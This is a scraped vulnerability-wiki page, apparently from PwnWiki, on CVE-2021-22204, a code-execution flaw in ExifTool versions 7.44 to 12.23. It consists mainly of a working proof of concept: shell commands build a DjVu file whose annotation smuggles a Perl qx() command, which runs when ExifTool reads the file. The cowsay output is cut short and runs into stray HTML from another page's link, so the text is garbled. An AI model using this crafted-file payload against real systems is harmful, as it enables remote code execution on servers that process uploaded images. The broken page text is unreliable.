Loading
0

CVE-2021-22204 ExifTool任意代码执行漏洞/he

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

גרסה מושפעת

ExifTool 7.44 to 12.23

POC

  $ printf 'P1 1 1 0' > moo.pbm
   $ cjb2 moo.pbm moo.djvu
   $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu
   $ exiftool moo.djvu > /dev/null
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
             " title="齐治堡垒机前台远程命令执行漏洞/zh-hans" rel="bookmark">齐治堡垒机前台远程命令执行漏洞/zh-hans
					
				
返回顶部